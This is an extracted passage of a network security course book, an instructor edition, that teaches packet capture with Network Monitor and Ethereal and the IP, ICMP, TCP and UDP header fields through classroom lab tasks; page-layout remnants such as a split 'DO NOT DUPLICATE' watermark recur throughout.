• Analyze network traffic.

• Filter specific protocols to capture.

In this lesson, you will be focusing on the capture and analysis of IP packets, andon the details of the protocol suite.

Trojan Horse:An apparently useful and

innocent program containingadditional hidden code which

allows the unauthorizedcollection, exploitation,

falsification, or destruction ofdata.

Ports Associated withTrojan Horses

22 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 76: SCNP Hardening

Figure 1-7: The default view of Network Monitor, showing the various panes.

In Figure 1-7, you can see the default view of Network Monitor. In this view, thescreen is split into several sections.

The top bar is the standard menu bar found in Microsoft programs. The basicfunctions on the toolbar that you will use in this lesson are contained in the Fileand Capture menus.

• The File menu contains three commands: Open, Save As, and Exit.

— Choose Open to open a previously saved Network Monitor capture.

— Choose Save As to save a Network Monitor capture.

— Choose Exit to exit.

• The Capture menu has more commands: Start, Stop, Stop And View, Pause,and Continue.

— The Start, Pause, and Continue commands are self-explanatory.

— The difference between Stop and Stop And View is that the Stop com-mand ends the capture. The Stop And View command ends the captureand switches Network Monitor to its next mode, Display View.

The other sections of the Capture View are panes (windows in a window) calledGraph, Session Stats, Station Stats, and Total Stats.

• The Graph pane provides five bars that measure percentages of pre-definedmetrics.

— The top graph indicates the percentage (%) of network utilization,meaning how much the network is being used.

— The second graph indicates the number of frames per second, meaningframes transmitted per second over the network.

— The third graph indicates the number of bytes per second that are trans-mitted over the network.

Lesson 1: Advanced TCP/IP 23

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 77: SCNP Hardening

— The fourth graph indicates the number of broadcasts per second that aretransmitted over the network.

— The fifth graph indicates the number of multicasts per second that aretransmitted over the network.

While a capture is running, these graphs work in realtime, providingcurrent data.

• The next pane is the Session Stats pane. In this pane, you can see the ses-sions that are taking place during the capture.

• Following the Session Stats is the Station Stats pane. In this pane, you cansee statistics per interface on the host, per broadcast, per multicast, andmore.

• The final pane in this view is the Total Stats pane. The Total Stats pane issubdivided into sections: Network Statistics, Captured Statistics, Per SecondStatistics, Network Card (MAC) Statistics, and Network Card (MAC) ErrorStatistics. From this pane, you can identify frames, broadcasts, multicasts,network utilization, errors, and more, all in realtime during the capture.

Displaying CapturesAfter you have captured network traffic, you can begin your analysis, whichrequires a different view of Network Monitor. You will need to use the DisplayView. You can switch to the Display View by either using the Capture→Stop AndView command or by using the Display Captured Data command after a capturesession has been stopped.

Figure 1-8: The Summary View of Network Monitor.

When you first open the Summary View, as shown in Figure 1-8, you will see atimeline of packets captured. By double-clicking any packet that was captured,you can look into its details and bring up the next view of Network Monitor.Once you have selected a packet, Network Monitor displays three panes for pre-senting information to you.

24 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 78: SCNP Hardening

Figure 1-9: The details of a packet in Network Monitor.

The top pane shown in Figure 1-9 is the Summary pane. This pane provides thebasic details of a packet, such as:

• Frame number

• Time the packet was captured

• Destination and source MAC addresses

• Protocol used

• Destination and source IP addresses

The middle pane shown in Figure 1-9 is the Detail pane. This pane provides theactual details of the protocol for the selected packet. Any line that has a plus signnext to it can be expanded for further detail.

The bottom pane in Figure 1-9 is the Hex pane. This pane provides the actualHex value for the raw data that each frame is comprised of. When you selectsomething in the Detail pane, it is highlighted in the Hex pane for comparison.Also, in this pane, the ASCII characters are visible. In the event that cleartext iscaptured, this is where it will be readable.

Network Monitor FiltersBecause Network Monitor has the ability to capture all network traffic, it wouldbe very easy to capture too much information and have difficulty in finding whatyou were looking for. This is where filtering comes into play. There are two typesof filters available in Network Monitor: capture filters and display filters. Forexample, if you wanted to capture only TCP messages, you could create a capturefilter so that only TCP messages are captured. If you wanted to view only ICMPmessages, you could create a display filter so that all you see are ICMPmessages. Figure 1-10 and Figure 1-11 show the dialog boxes used for each filtertype.

Lesson 1: Advanced TCP/IP 25

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 79: SCNP Hardening

To create or use filters, choose Capture→Filter. Using filters not only makes iteasier for you, as an analyst, to find what you are looking for, but they allow forthe buffer that stores the capture to not be filled with useless information.

Figure 1-10: Network Monitor’s Capture Filter dialog box.

Figure 1-11 shows the Display Filter dialog box.

Figure 1-11: Network Monitor’s Display Filter dialog box.

26 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 80: SCNP Hardening

When using filtering, you will likely use either protocol or address filtering. Withprotocol filtering, you identify a specific protocol to work with. With address fil-tering, you again define the specific address to filter. Filters can be implementedin different directions, either traffic into this host, outbound from this host, or inboth directions. These options are implemented by selecting the appropriate arrow(one of these three: --->, ---<, or <-->) for the function you want toperform.

TASK 1B-1Using Network Monitor

1. Open a command prompt, and enter ipconfig /all.

If you are on the LEFT side of the classroom, your IP addresses will be 172.16.10.x (for the network card connected to the classroom hub) and 172.26.10.x (for the network card connected to your partner’s computer via acrossover cable). If you are on the RIGHT side of the classroom, your IPaddresses will be 172.18.10.x (for the network card connected to the class-room hub) and 172.28.10.x (for the network card connected to your partner’scomputer via a crossover cable).

2. Record the MAC and IP addresses for the two network cards in yourcomputer.

MAC address Each card will have a unique MAC address.IP address Each card will have a unique IP address.MAC address Each card will have a unique MAC address.IP address Each card will have a unique IP address.

3. Close the Command Prompt window.

4. Open Network Monitor. (From the Start menu, choose Programs→Administrative Tools→Network Monitor.)

When you run Network Monitor the first time on a multi-homed computer,you might receive the following pop-up warning, or one similar to it.

5. If you see the Select Default Network message box, click OK to display theSelect A Network dialog box. Expand the + sign next to Local Computer,select the interface with the MAC address associated with the ClassroomHub interface, and click OK.

6. Choose Capture→Start, or press the F10 key to start a capture.

Lesson 1: Advanced TCP/IP 27

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 81: SCNP Hardening

7. If you are on the LEFT side of the classroom, ping the IP address 172.16.0.1. If you are on the RIGHT side of the classroom, ping the IP address172.18.0.1. This will create network traffic for you to capture.

8. Wait for 30 to 40 seconds. As you wait, watch the realtime statisticschange in the Network Monitor Capture window.

9. Choose Capture→Stop And View. You should now see the Display View,including the timeline of the packets captured.

10. Double-click any packet to change to the Detail View.

11. Observe the structure of the three panes in this view, and expand any +signs displayed in the middle pane.

12. Choose Display→Filter.

13. Select Protocol==Any, and click the Edit Expression button.

14. With the Protocol tab selected, click the Disable All button.

15. Scroll down to ICMP, select ICMP, and click the Enable button. TheExpression field at the top of the dialog box should now display Protocol ==ICMP. Click OK.

16. Click OK to implement this filter on your capture.

17. Observe that only ICMP frames are visible in your window now.

18. Choose File→Save As, and save the capture as First_Capture.cap, in thedefault location.

19. Close Network Monitor.

EtherealAnother product that you can use to capture data is called Ethereal. With Ethe-real, data can be captured off the wire or read from a captured file. Data can alsobe saved to a file in a format that Microsoft’s Network Monitor can understand.The current version of Ethereal (0.9.11) can analyze over 300 Data Link, Net-work, Transport, and Application layer protocols.

To perform promiscuous mode captures on a Windows machine, you have to firstdownload and install the latest version of WinPcap (at least WinPcap 2.3); do notinstall any alpha or beta versions. WinPcap is the Windows equivalent of libpcap(LIBrary for Packet CAPtures) for Linux. It can be obtained at http://winpcap.polito.it. In fact, you will use WinPcap later in the course, along withother tools such as windump, tcpdump, nmap, and snort.

If you need to download Ethereal, be sure to get at least version 0.9.11. It can beobtained at www.ethereal.com.

promiscuous mode:Normally an Ethernet

interface reads all addressinformation and accepts

follow-on packets onlydestined for itself, but when

the interface is inpromiscuous mode, it reads

all information (sniffer),regardless of its destination.

28 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 82: SCNP Hardening

TASK 1B-2Installing and Starting Ethereal

1. Create a folder called Ethereal at the root of your Windows 2000 boot par-tition (for example, C:\).

2. Copy the files WinPcap_2_3.exe and ethereal-setup-0.9.11.exe to thisfolder. Your instructor will tell you where to obtain these files.

3. Double-click WinPcap_2_3.exe, accept all defaults, including agreeing tothe licensing agreement, and wait for the install to complete.

4. Double-click ethereal-setup-0.9.11.exe, agree to the licensing agreement,leave all options set to the defaults, including the default installationfolder. When the install is done, click Close.

5. Once it has been installed, to run Ethereal, double-click the icon for Ethe-real on the desktop, or choose (from the Start menu) Programs→Ethereal→Ethereal.

Ethereal OverviewWhen you first start Ethereal, you will see a GUI with three panes. The top panelists the captured frames in sequence. When you highlight a frame, the middlepane provides protocol layer information about that frame, and the bottom paneshows the details of the frame in both Hex and ASCII values.

Lesson 1: Advanced TCP/IP 29

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 83: SCNP Hardening

Figure 1-12: The Ethereal GUI.

Above the top frame there is a menu bar, with File, Edit, Capture, Display, andTools menus towards the left side, and at the right corner there’s a Help menu.Below the bottom frame, you will see four buttons: the Filter button, a drop-down bar, the Reset button, and the Apply button.

When you want to start a capture, navigate to the menu at the top and chooseCapture→Start. You can also start a capture with the Ctrl+K key combination.When you do so, you will see a dialog box asking you to specify the following:

• The interface to capture from.

• Whether you want to limit a capture to a particular size.

• Whether you want to capture packets in promiscuous mode (you will needWinPcap to do so).

• Any capture filters you want to apply.

• The name of the file you want to save your captures to (you can do this lateras well).

• Whether you want to view the captures as they are being captured (viawindump).

• Parameters defining when the captures should be stopped.

• Whether you want to enable or disable name resolution at the Data Link,Network, and Transport layers.

30 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 84: SCNP Hardening

Figure 1-13: Ethereal’s Capture Options dialog box.

When you click OK, capture will start on the selected network interface and youwill see another pop-up informing you of that. Ethereal will continue with thecapture until you click the Stop button.

Figure 1-14: Ethereal pop-up displaying capture information.

Lesson 1: Advanced TCP/IP 31

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 85: SCNP Hardening

After you stop a capture, you can view it. Then when you are done and want tosave the capture for future reference:

1. Choose File→Save or File→Save As.

2. Provide the location to the folder where you want to save the file.

3. Click File Type and specify the output format.

4. Click OK to save the file.

Figure 1-15: The many Save As options in Ethereal.

Notice how many choices you have for saving a capture—you can save to Net-work Monitor’s format if you want. (Conversely, Ethereal will read a capturesaved by any of the protocol analyzers in the list.) When you are done with cap-ture and analysis and want to close the program, choose File→Quit or pressCtrl+Q.

TASK 1B-3Using Ethereal

Setup: Ethereal has been successfully installed and is running on yourcomputer.

1. Choose Capture→Start to display the Capture Options dialog box.

2. Observe the list of network interfaces displayed in the Capture Optionsdialog box. The network interfaces are listed differently than in NetworkMonitor.

32 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 86: SCNP Hardening

3. Select the network interface you want to perform the capture on. In thiscase, you would select the Classroom Hub interface.

4. Verify that you have selected Promiscuous mode capture.

5. Click OK.

6. Ping your router’s IP address.

7. Click Stop to stop and view the capture.

8. Double-click any frame where your computer is the source, the router isthe destination, and the protocol is ICMP.

9. View the frame details.

10. Verify that you can relate to these captures in much the same way as yourearlier Network Monitor captures.

11. Close Ethereal.

TCP ConnectionsEarlier, you were introduced to the function of and the process of control flags,the three-way handshake, and the session teardown. In this section, you are goingto use Network Monitor to view the three-way handshake, packet by packet, andto view the teardown, packet by packet.

Remember, the three-way handshake is used by two hosts when they are creatinga session. The first host begins by sending out a packet with the SYN flag set,and no other flags. The second packet is a response with both the SYN and ACKflags set. The third part of the session establishment will have the ACK flag set.

TASK 1B-4Analyzing the Three-way Handshake

1. Open Network Monitor, and start a capture.

2. At a command prompt:

If you are on the LEFT side of the classroom, enter telnet 172.16.0.1.

If you are on the RIGHT side of the classroom, enter telnet 172.18.0.1.

To make sure you knowwhich interface is the rightone, start Regedit, andnavigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,which displays networkinterfaces with Hex values(the same way Ethereal liststhem). Select an interface,and look for the string valueIPAddress. Find the interfacewhose IP address is 172.16.10.x (if you are seated on theLEFT side of the class) or172.18.10.x (if you areseated on the RIGHT side).Jot down the first few Hexcharacters (just enough touniquely identify theinterface), close Regedit,switch back to Ethereal, andselect the network adapterwhose Hex values match thecharacters you recorded.

If necessary, adjust thescreen resolution so that youcan access the OK button atthe bottom of the CaptureOptions dialog box.

Lesson 1: Advanced TCP/IP 33

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 87: SCNP Hardening

3. When you are presented with a logon prompt for User Access Verification,press Enter repeatedly until your screen resembles the following graphic.

Minimize the Command Prompt window.

4. Switch back to Network Monitor, and choose Capture→Stop And View.

5. In the Summary pane, identify the frames that are involved in the three-way handshake.

6. Once you have identified the frames that are part of the three-way hand-shake, based on the discussion, look for the following:

a. In the first frame, what are the SEQ number, ACK number, and flags?

b. In the second frame, what are the SEQ number, ACK number, andflags?

c. In the third frame, what are the SEQ number, ACK number, and flags?

7. Expand each of the three frames in the handshake, and examine them ingreater detail in the Detail pane.

8. Using the Hex pane, identify the value for the flags that are set for eachframe.

9. Leave Network Monitor open, along with this capture, for the next task.

The Session Teardown ProcessPreviously, you examined the session teardown process. Here, you will examinethe details of the session teardown. Remember, there are four parts of sessionteardown.

34 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 88: SCNP Hardening

TASK 1B-5Analyzing the Session Teardown Process

Setup: Network Monitor is running, and the last capture you per-formed is displayed.

1. In the Summary pane, identify the frames that are involved in the sessionteardown.

2. Once you have identified the frames, examine them in greater detail in theDetail pane.

3. In each frame, identify at least the following:

a. Flags that are set.

b. Sequence number.

c. Acknowledgement number.

4. Save the capture as tcp_connections.cap and close the capture.

5. Minimize Network Monitor.

Topic 1CCapturing and Identifying IP DatagramsAlong with TCP, the protocol you will spend the most time analyzing will be IP.This protocol is the one that does the most work of the entire TCP/IP suite. InFigure 1-16, you can see the actual format of the IP datagram. There are sevenrows of information in the figure, with the critical rows being the first five. Whena computer receives an IP datagram, it will begin reading on Row One on the leftside, bit by bit. Once it reads through Row One, it will read Row Two, and soon.

To work with IP further, referto RFC 791.

IP Datagram, with AllFields Shown

Lesson 1: Advanced TCP/IP 35

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 89: SCNP Hardening

Figure 1-16: An IP datagram with all fields shown.

Using Figure 1-16, we will move through the header, identifying the function ofeach area. After identifying the header fields, we will use Network Monitor tocapture and analyze the IP header.

• Starting on Row One, on the left side is a field called Version. This is a 4-bitfield that defines the version of IP that is currently running. Right now, thiswill likely be a value of 4, as that is the current industry standard—IPv4, orIP version 4. Some instances may be using IP version 6, or IPv6, which youwill examine later in the course.

• Moving to the right of the Version is a field called Header Length (IHL).This is a 4-bit field that defines the number of 32-bit words in the headeritself, including options. In most captures, this value will be 5, for nooptions set, the normal value.

• Continuing to the right of Header Length is a field called Type Of Service.This is an 8-bit field that defines the quality of service for this packet. Dif-ferent applications may require different needs of available bandwidth, andtype of service is one way of addressing those needs.

• The last field on Row One is the field called Total Length. This is a 16-bitfield that defines the length of the entire IP datagram in bytes.

• Starting on Row Two, on the left side is a field called Identification. This isa 16-bit field that defines each datagram sent by the host. The standard forthis field is for the identification value to increment by one for everydatagram sent.

• Following the Identification field is a field called Flags. Not to be confusedwith the flags of TCP, which you have seen, this is a 3-bit field that is usedin conjunction with fragmentation. The first of the three bits is to be set at 0,

36 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 90: SCNP Hardening

as a default. The next bit is known as the DF bit, or Don’t Fragment. Thethird bit is known as the MF bit, or More Fragment.

• The last field on Row Two is a field called Fragment Offset. This is a 13-bitfield that is used to define where in the datagram this fragment belongs. (Ifthere is fragmentation, the first fragment will have an offset of 0.)

• Starting on Row Three, on the left side, is a field called Time To Live. Thisis an 8-bit field that is used to define the maximum amount of time thisdatagram may be allowed to exist in the network. The TTL is created by thesender and lowers by 1 for every router that the datagram crosses. If theTTL reaches 0, the packet is to be discarded.

• Moving to the right is a field called Protocol. This is an 8-bit field that isused to define the upper-layer protocol that is in use for this datagram. Thereare many unique protocol numbers, and if you wish to study all of the num-bers, please refer to RFC 790. However, the following list identifies severalimportant Protocol ID numbers:

— Protocol ID Number 1: ICMP

— Protocol ID Number 6: TCP

— Protocol ID Number 17: UDP

• The final field on Row Three is a field called Header Checksum. This is a16-bit field that is used to provide a check on the IP header only; this is nota checksum for any data following the header. This checksum providesintegrity for the header itself.

• The Fourth Row is a single field, the Source IP Address. This field is a32-bit value that identifies the IP address of the source host of this packet.

• The Fifth Row is also a single field, the Destination IP Address. This field isa 32-bit value that identifies the IP address of the destination host for thispacket.

• The Sixth Row contains any options that may be present. This is a variable,with no absolute fixed size to the options. Some of the options that may bein this field are those that are related to routing or timekeeping. If optionsare used, there will be padding added so this field equals 32 bits in size.

• The Seventh and final Row is the representation of the data. By this point,the header is complete and the data the user wishes to send or receive isstored in the packet.

TASK 1C-1Capturing and Identifying IP Datagrams

Setup: You are logged on to Windows 2000 as Administrator. A com-mand prompt and Network Monitor are running.

1. If necessary, enable the FTP service.

2. In Network Monitor, start a capture, and leave this running.

3. At the command prompt, enter ftp ip_address, where ip_address is theaddress of a neighboring computer.

integrity:Assuring information will notbe accidentally ormaliciously altered ordestroyed.

Lesson 1: Advanced TCP/IP 37

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 91: SCNP Hardening

4. Log on as Anonymous.

5. After you are logged on, enter quit to end the FTP session.

6. Back in Network Monitor, choose Capture→Stop And View to view thecaptured frames.

7. Observe the Protocol column. We are interested only in the TCP and FTPframes. Apply a filter to show only TCP and FTP, and then double-clickany FTP frame. For the specific steps to add filters, see Task 1B-1, step 12through step 16.

8. Examine the IP header, compared to the discussion. Look for the follow-ing:

a. Version Number

b. Time To Live

c. Protocol ID

d. Source Address

e. Destination Address

9. Once you are done examining the IP header, save the capture asIP_Header.cap and close the capture.

Topic 1DCapturing and Identifying ICMP MessagesWhen you are analyzing protocols, it should become immediately apparent thatthere are differences between ICMP and the other protocols discussed in thislesson. There is a similar concept in that the ICMP message is encapsulated inthe IP datagram, just as you saw with TCP and UDP. In Figure 1-17, you can seethe actual format of the ICMP message. There are only two rows of informationshown in the figure.

Figure 1-17: An ICMP message with all fields shown.

To work with ICMP further,refer to RFC 792.

ICMP Message, with AllFields Shown

38 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 92: SCNP Hardening

Using Figure 1-17, we will move through the header, identifying the function ofeach area. After identifying the header fields, we will use Network Monitor tocapture and analyze an ICMP message.

• Starting on Row One, on the left side, the first field is called Type. This isan 8-bit value that identifies the specific ICMP message. For example, aType could be 3, which is a type of unreachable message.

• Following Type on Row One is a field called Code. This is an 8-bit valuethat works in conjunction with Type to define the specific details of theICMP message. For example, using Type 3, the Code could be 1, which isdestination host unreachable.

• Moving along on Row One, the final field is called Checksum. This is a16-bit value that checks the integrity of the entire ICMP message.

• The Second Row has no fixed fields. Depending on the Type and Code ofthe ICMP message, this field may contain many things. One example ofwhat may go in this field is timestamping of messages.

TASK 1D-1Capturing and Identifying ICMP Messages

Setup: You are logged on to Windows 2000 as Administrator. A com-mand prompt and Network Monitor are running.

1. Begin a new capture.

2. Switch to the command prompt, and ping a valid IP address of anotherhost in your subnet. Wait for the ping to finish, and then minimize thecommand prompt.

3. In Network Monitor, stop and view the capture.

4. Scroll down the packets captured to identify ICMP messages, or createan ICMP filter.

5. Analyze the captured frames to identify the ping process between yourcomputer and the host you pinged.

6. Compare the messages to the discussion, looking for the following:

a. Source IP Address

b. Destination IP Address

c. Type

d. Code

e. Payload for ping

7. Save this capture as Valid_Ping.cap and close it. You are going to runanother capture.

8. Begin a new capture.

Lesson 1: Advanced TCP/IP 39

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 93: SCNP Hardening

9. Switch to the command prompt, ping a known invalid IP address foryour network, wait for the ping to finish, and minimize the commandprompt. For instance, if you were to ping the address 208.18.24.2, youshould receive a message indicating that the request timed out. Or, if you areon the 172.16.10.0 network, you might try to ping the address 172.16.10.201, as that address is unlikely to be in use on your network.

10. In Network Monitor, stop and view the capture.

11. Scroll down the packets captured to identify ICMP messages.

12. Analyze the captured frames, and compare them to the discussion, look-ing for the following:

a. Source IP Address

b. Destination IP Address

c. Type

d. Code

13. Save this capture as icmpheader.cap, and close the capture.

Topic 1ECapturing and Identifying TCP HeadersWhen investigating TCP/IP, you will find that TCP data is encapsulated in the IPdatagram. Since you have already looked into the IP datagram itself, at this stageyou will examine TCP further. In Figure 1-18, you can see the actual format ofthe TCP header. There are seven rows of information in the figure, with the criti-cal ones for this discussion being the first five. Just as with IP, when a computerreceives the TCP header, it will begin reading on Row One on the left side, bitby bit. Once it reads through Row One, it will read Row Two, and so on.

Figure 1-18: A TCP header with all fields shown.

To work with TCP further,refer to RFC 793.

TCP Header, with All FieldsShown

40 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 94: SCNP Hardening

Using Figure 1-18, we will move through the header, identifying the function ofeach area. After identifying the header fields, we will use Network Monitor tocapture and analyze the TCP header.

• Starting on Row One, on the left side is a field called Source Port Number.This field is a 16-bit number that defines the upper-layer application that isusing TCP on the source host.

• The second field on Row One is a field called Destination Port Number. Thisis a 16-bit field that defines the upper-layer application that is using TCP onthe destination host. The combination of an IP address and a port number isoften called a socket. A socket pair identifies both ends of a communicationcompletely, by using the host IP address and port and the destination IPaddress and port.

• Moving onto Row Two, the entire row is a single field called SequenceNumber. This is a 32-bit value that identifies the unique sequence number ofthis packet. The sequence numbers are used to track communication and arepart of the reason TCP is considered a connection-oriented protocol.

• In Row Three, you can see that the entire row is also a single field, calledAcknowledgement Number. This is a 32-bit value that provides a response toa sequence number. Under normal operations, this value will be the value ofthe sequence number of the last packet received in this line of communica-tion, plus 1. There will be a value in this field only if the ACK flag is turnedon (flags are in the next row).

• Continuing on to Row Four, starting on the left side is a field called Offset(sometimes also called Header Length). This is a 4-bit value that defines thesize of the TCP header. Because this is a 4-bit value, the limit on the size ofthe header is 60 bytes. If there are no options set, the size of the header is20 bytes.

• Moving to the right is a field called Reserved. This is a 6-bit value that isalways left at 0 for functioning hosts using TCP/IP. It is not used for anynormal network traffic.

• After the Reserved field are the six Control Flags. Each flag is only 1 bit,either on or off. There are six control flags, and they are listed as follows inthe left-to-right order they occupy in the TCP header:

— URG: If this is a 1, the Urgent flag is set.

— ACK: If this is a 1, the Acknowledgement flag is set.

— PSH: If this is a 1, the Push flag is set.

— RST: If this is a 1, the Reset flag is set.

— SYN: If this is a 1, the Synchronize flag is set.

— FIN: If this is a 1, the Finish flag is set.

For a detailed discussion on the flags and their functions, please reviewthat section earlier in this lesson.

• Following the Control Flags on Row Four is a field called Window Size.This is a 16-bit value that identifies the number of bytes, starting with theone defined in the Acknowledgement field, that the sender of this segment iswilling to accept.

• Moving on to Row Five, on the left side, there is a field called TCPChecksum. This is a 16-bit value that is used to provide an integrity check

Lesson 1: Advanced TCP/IP 41

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 95: SCNP Hardening

of the TCP header and the TCP data. The value is calculated by the sender,then stored and the receiver compares the value upon receipt.

• Following the TCP checksum on Row Five is a field called Urgent Pointer.This is a 16-bit value that is used if the sender must send emergencyinformation. The pointer points to the sequence number of the byte that fol-lows the urgent data, and is only active if the URG flag has been set.

• The Sixth Row has only one field, called Options. This is a 32-bit value thatis often used to define a maximum segment size (MSS). MSS is used so thesender can inform the receiver of the maximum segment size that the senderis going to receive on return communication. In the event that the options setdo not take up all 32 bits, padding will be added to fill the field.

• The Seventh and final Row is the representation of the data. By this point,the header is complete and the data the user wants to send or receive isstored in the packet.

TASK 1E-1Capturing and Identifying TCP Headers

Setup: You are logged on to Windows 2000 as Administrator. A com-mand prompt and Network Monitor are running.

1. Begin a new capture.

2. Switch to the command prompt and initiate a Telnet session to a neigh-boring host. Whether or not it connects at this time is not important, so theTelnet service does not need to be on.

3. If the Telnet session starts, exit the Telnet session; otherwise, close thecommand prompt.

4. Stop and view the capture.

5. Add a filter so that all you see are TCP frames. For the specific steps toadd filters, see Task 1B-1, step 12 through step 16.

6. Analyze the TCP headers in the frames.

7. When analyzing the headers, look for the following:

a. Sequence Numbers

b. Acknowledgement Numbers

c. Source Port Numbers

d. Destination Port Numbers

8. Once you have analyzed the header, save the capture asTelnet_Attempt.cap, and close the capture.

42 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 96: SCNP Hardening

Topic 1FCapturing and Identifying UDP HeadersCompared to TCP, UDP is a very simple transport protocol. The UDP header anddata will be completely encapsulated in the IP datagram, just as with TCP. In Fig-ure 1-19, you can see the actual format of the UDP header. There are three rowsof information in the figure. Just as with TCP, when a computer receives the UDPheader, it will begin reading on Row One on the left side, bit by bit. Once itreads through Row One, it will read Row Two, and so on.

Figure 1-19: A UDP header with all fields shown.

Using Figure 1-19, we will move through the header, identifying the function ofeach area. After identifying the header fields, we will use Network Monitor tocapture and analyze the UDP header.

• Starting on Row One, on the left side is a field called Source Port Number.This field is a 16-bit value that defines the upper-layer application that isusing UDP on the source host.

• The second field on Row One is called Destination Port Number. This fieldis a 16-bit value that defines the upper-layer application that is using UDPon the destination host.

• On the Second Row, the field on the left is called UDP Length. This is a16-bit value that identifies the length of the UDP data and the UDP header.

• The second field on Row Two is a field called UDP Checksum. This is a16-bit value that is used to provide an integrity check of the UDP headerand the UDP data. The value is calculated by the sender, then stored, and thereceiver compares the value upon receipt.

• Row Three is where the actual user data is stored. It is possible for a user tosend a UDP datagram with zero bytes of data.

TASK 1F-1Working with UDP Headers

Setup: You are logged on to Windows 2000 as Administrator, andNetwork Monitor is running.

1. Browse your course CD-ROM to find a folder called \085545\Data\Captures. In that folder is a file called tftp.cap. Open tftp.cap in NetworkMonitor.

To work with UDP further,refer to RFC 768.

UDP Header, with All FieldsShown

Lesson 1: Advanced TCP/IP 43

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 97: SCNP Hardening

2. Expand the details of any UDP frame, and compare it to the discussion.Look for the following:

a. Source Port

b. Destination Port

c. What the actual UDP data is

3. As you are analyzing this traffic, verify that no session was established, asUDP is connectionless.

4. Close the capture.

Topic 1GAnalyzing Packet FragmentationPacket-switched networks will all, at one time or another, experiencefragmentation. This is due to the fact that all complex networks are made up ofvarious physical media and configurations. So, a packet of a certain size might fitfine on one segment, but may suddenly be many times larger than the capacity ofthe next segment. The size limit that is allowed to exist on a network varies fromnetwork to network and is referred to as the Maximum Transmission Unit(MTU).

In the event that a datagram gets fragmented, it is not reassembled until it reachesits final destination. When the datagram is fragmented, each fragment becomes itsown unique packet—transmitted and received uniquely.

TCP segments are sent using IP datagrams. TCP expects a one-to-one ratio ofsegments to datagrams. Therefore, IP on the receiving end must completely reas-semble the datagram before handing the segment to TCP. In the relationshipbetween TCP and IP, the following rules that affect fragmentation are defined:

• The TCP Maximum Segment Size (MSS) is the IP Maximum Datagram Sizeminus 40 octets.

• The default IP Maximum Datagram Size is 576 octets.

• The default TCP Maximum Segment Size is 536 octets.

Fragmentation will rarely happen at the source of a datagram, but it is possible.For example, if a receiving host says it can accept segments that are many timeslarger than what the sender normally sends. Another example would be a host ona small-packet-sized network, such as PPP, and using an application with a fixed-size message.

The common location then for fragmentation is at a gateway, where the odds ofdifferent MTUs on different interfaces are very high. The following list shows theMTU for various media:

• PPP: 296 bytes

• Ethernet: 1500 bytes

• FDDI: 4352 bytes

• Token Ring (4 MB/s): 4464 bytes

• Token Ring (16 MB/s): 17914 bytes

Fragmentation Rules

The official minimum MTU is68, and the maximum is

65535.

44 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 98: SCNP Hardening

Figure 1-20: How fragmentation works.

TASK 1G-1Analyzing Fragmentation

Setup: You are logged on to Windows 2000 as Administrator, andNetwork Monitor is running.

1. On the course CD-ROM, navigate to the \085545\Data\Captures folder,and open fragment.cap in Network Monitor.

2. Expand the details of frame 1, looking for the Fragment flag.

3. Observe that, in frame 1, there is no Fragment Offset, as this is the firstfragment.

4. Select several consecutive frames. Observe that each successive frame hasa higher Fragment Offset as it gets farther from the beginning of the originaldatagram.

5. Observe that the IP ID stays constant for each fragment.

6. Expand the details of frame 16.

7. Observe that the Fragment flags are now both 0, indicating this is the lastof the fragments.

8. Close the capture.

How Fragmentation Works

Lesson 1: Advanced TCP/IP 45

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 99: SCNP Hardening

Topic 1HAnalyzing an Entire SessionNow that you have analyzed IP, TCP, UDP, ICMP, fragmentation, handshakes,and teardowns, it is time to put them together. In this topic, you will follow alongusing two sample captures that were made specifically for this purpose. One cap-ture is a PING capture, and the other is an FTP capture. By analyzing them, youwill see completely how TCP/IP functions—from start to finish.

About the TasksIn the following tasks, Windows 2000 Network Monitor was used to capture aping between two hosts and an ftp session between two hosts. The ping and ftpcommands were run from the command prompt, and the output saved to the textfiles ping.txt and ftp.txt, respectively. The Network Monitor captures were savedto files ping.cap and ftp.cap, respectively. You can open the TXT files withNotepad to see the commands and responses. You can open the CAP files withNetwork Monitor and see the frames captured as a result. Let’s take a look.

TASK 1H-1Performing a Complete ICMP Session Analysis

Objective: To use the supplied capture and text files to examine theTCP/IP headers, in order to understand how a session is setup, used, and torn down.

Setup: You are logged on to Windows 2000 as Administrator, andNetwork Monitor is running.

1. Start Notepad, and open the file ping.txt. This file is on your courseCD-ROM, in the \085545\Data\Captures folder. You should see the outputshown in the following graphic.

2. Keep this file open.

46 Hardening The Infrastructure (SCP)

DO N

OT

